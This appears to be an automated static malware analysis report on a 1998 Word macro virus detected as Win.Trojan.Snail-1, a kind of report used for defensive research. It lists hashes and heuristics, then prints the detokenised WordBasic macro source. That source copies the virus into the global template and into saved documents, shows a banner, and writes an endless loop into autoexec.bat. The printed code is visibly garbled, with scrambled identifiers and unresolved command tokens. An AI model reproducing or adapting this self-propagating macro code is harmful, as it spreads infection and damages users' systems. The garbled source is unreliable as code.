Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c908ae454dd0b988…

MALICIOUS

Office (OLE)

14.5 KB First seen: 2012-06-14
MD5: ff2fecc1164c742bfd176996f3adce50 SHA-1: a076fc43feda50f87889eb5cd51b5b0b3c95dfe5 SHA-256: c908ae454dd0b9888767577f80ad077ff41c1659f77cedc44609c7cedd234340
102 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file exhibits characteristics of a legacy macro virus, specifically identified by "RSN MACRO VIRUS" markers and a ClamAV detection of "Win.Trojan.Snail-1". The document body contains numerous VBA-like keywords and strings, indicating the presence of malicious macros. The primary purpose appears to be propagation and infection, typical of older macro viruses.

Heuristics 3

  • ClamAV: Win.Trojan.Snail-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Snail-1
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Recovered legacy WordBasic macro source info OLE_LEGACY_WORDBASIC_MACRO_SOURCE
    The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
wordbasic_macros.txt wordbasic-macro analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source) 4297 bytes
SHA-256: 6533b01096a5f1a1d8c75b8988e329fb63c7983546a1239f3976b2509525f28d
Preview script
First 1,000 lines of the extracted script
+ = = - *
25961
26465 * *   58721 -
mausyqccemeD$ 2 , aDsRfS$ , gigl , giglgigl , qccarimRn$ , datschl$ , autiglp$ , steumausyqccer$ , nameitmy$ , s$ , st$
MAIN
AnsichtSymbigllleisten @cmd6c6c 26981 = "mausyqccerigl" , @cmd6e65
allgm$ = AbrufenDiglusyqcceumentQCCar$ "allgmausyqcce"
allgm$ = "autigl"
dFsAeRdFt
allgm$ = "datsp"
sDtZqccG
payligladA
payligladB
dFsAeRdFt
RMiglN
dlg DateiDateiInfigl REM just
GetCurQCCalues dlg REM figlr
FssFeG$ = dlg @cmd6f00 REM fun
hauptmausyqcce$ = AbrufenDiglusyqcceumentQCCar$ "steumausyqcce"
dateisp$ = AbrufenDiglusyqcceumentQCCar$ "datsp"
infbabe$ = GetPriglfileString$ "embedding" , "qccxdRNDM"
@cmd8003 infbabe$ 23
SetPriglfileString "embedding" , "qccxdRNDM" , mausyqccemeD$ 0
SetPriglfileString "embedding" , "TasusyqcceRNDM" , mausyqccemeD$ 1
SetPriglfileString "embedding" , "SystemRNDM" , mausyqccemeD$ 2
autiglstFsasere$ = @cmd818c 8
affd$ = autiglstFsasere$ = "\micriglsiglft.diglt"
@cmd004f @cmd756c @cmd726c 26465 = 1
@cmd0054 = affd$ , @cmd726c = 1
MausyqcceriglUSYQCCEiglpieren FssFeG$ =
25961 , "micriglsiglft:" = mausyqccemeD$ 0 , 1
MausyqcceriglUSYQCCEiglpieren FssFeG$ = ":" = dateisp$ , "micriglsiglft:dateispeichernunter" , 1
MausyqcceriglUSYQCCEiglpieren FssFeG$ = ":" = hauptmausyqcce$ , "micriglsiglft:" = mausyqccemeD$ 1
MausyqcceriglUSYQCCEiglpieren FssFeG$ = ":autigliglpen" , "micriglsiglft:" = mausyqccemeD$ 2 , 1
MausyqcceriglUSYQCCEiglpieren FssFeG$ = ":dateidiglusyqcceqcciglrlagen" , "micriglsiglft:dateidiglusyqcceqcciglrlagen" , 1
MausyqcceriglUSYQCCEiglpieren FssFeG$ = ":extrasmausyqccerigl" , "micriglsiglft:extrasmausyqccerigl" , 1
@cmd80a0 1
@cmd8178 affd$ , 1
sDtZqccG
RMiglN
REM dis riglutine is qccery buggy
IGLn Erriglr Gigltigl finel
d$ = @cmd8025
dd$ = @cmd8009 d$ , 3
dd$ = "diglc" IGLr dd$ = "rtf"
tb = cusyqccei
bz @cmd0054
GetCurQCCalues bz
dd$ = "diglc"
bz @cmd726c = 0
dd$ = "rtf"
bz @cmd726c = 6
tb = 1
marusyqcce
Dialiglg bz
tb = 1
@cmd756c 25961 2
bz @cmd726c = 1
@cmd0054 bz
nameitmy$ = bz
ax$ = @cmd8008 nameitmy$ , 1
ax$ = @cmd8005 34
nameitmy$ = @cmd800a nameitmy$ , 2 , @cmd8003 nameitmy$ 2
tb = 0 IGLr d$ nameitmy$ REM d$ neqccer=na !
DiglusyqcceumentQCCariableBestimmen "datsp" , mausyqccemeD$ 0
DiglusyqcceumentQCCariableBestimmen "steumausyqcce" , mausyqccemeD$ 1
datschl$ = GetPriglfileString$ "embedding" , "qccxdRNDM"
autiglp$ = GetPriglfileString$ "embedding" , "SystemRNDM"
steumausyqccer$ = GetPriglfileString$ "embedding" , "TasusyqcceRNDM"
MausyqcceriglUSYQCCEiglpieren "micriglsiglft:dateispeichernunter" , nameitmy$ = ":" = mausyqccemeD$ 0 , 1
MausyqcceriglUSYQCCEiglpieren "micriglsiglft:" = datschl$ , nameitmy$ =
25961 , 1
MausyqcceriglUSYQCCEiglpieren "micriglsiglft:" = steumausyqccer$ , nameitmy$ = ":" = mausyqccemeD$ 1
MausyqcceriglUSYQCCEiglpieren "micriglsiglft:" = autiglp$ , nameitmy$ = ":autigliglpen" , 1
MausyqcceriglUSYQCCEiglpieren "micriglsiglft:dateidiglusyqcceqcciglrlagen" , nameitmy$ = ":dateidiglusyqcceqcciglrlagen" , 1
MausyqcceriglUSYQCCEiglpieren "micriglsiglft:extrasmausyqccerigl" , nameitmy$ = ":extrasmausyqccerigl" , 1
@cmd0053
25625 err = 102 tb = 1
@cmd756c 25961 2
err = 0
RMiglN
Figlr qccarime = 0 Tigl 2
DfEtZfUSYQCCELL = @cmd8002 @cmd800e 53 = 1 23 = 23
zahl DfEtZfUSYQCCELL
Figlr n = 1 Tigl DfEtZfUSYQCCELL
zahl n 47 IGLr zahl n 58 zahl n 64 IGLr zahl n 91 zahl n 96
zahl n = @cmd8002 @cmd800e 122 = 1 48 = 48
n = 1 zahl n 48 zahl n 57
zahl n = @cmd8002 @cmd800e 122 = 1 48 = 48
mausyqccemeD$ qccarime = mausyqccemeD$ qccarime = @cmd8005 zahl n
n
qccarime
marusyqcce
BearbeitenAllesMarusyqcceieren
BearbeitenUSYQCCEiglpieren
@cmd004f
@cmd006e
Functiigln Cusyqccei
uh$ = AbrufenDiglusyqcceumentQCCar$ "steumausyqcce"
Cusyqccei = 0
uh$
zm = 28261 @cmd736c 1
zm 0
Figlr iy = 1 Tigl zm
MausyqcceriglName$ iy , 1 = uh$
Cusyqccei = 1
iy
Functiigln
payligladA
@cmd80f2 @cmd80f7 = 30
@cmd0246
BearbeitenAllesMarusyqcceieren
@cmd807c "Arial Blacusyqcce" , 50
@cmd8012 "Leeglize Cannabis !! R.M.M  (C) by MaD USYQCCEiFFeR 05.09.98"
@cmd802c 16
@cmd802c 16
@cmd802c 16
payligladB
@cmd80f2 @cmd80f7 = 15
aiglh$ = "Infected with RnDm MuTanT MuTaGeN (c) MaD USYQCCEiFFeR 05.09.98"
exc$ = @cmd8008 @cmd80ee "windir" , 1 = ":\autiglexec.bat"
IGLpen exc$ Figlr 1
1 , "@echigl iglff"
1 , ":Mrusyqcce"
1 , "echigl " = aiglh$
1 , "gigltigl Mrusyqcce"
Cliglse 1
* , ,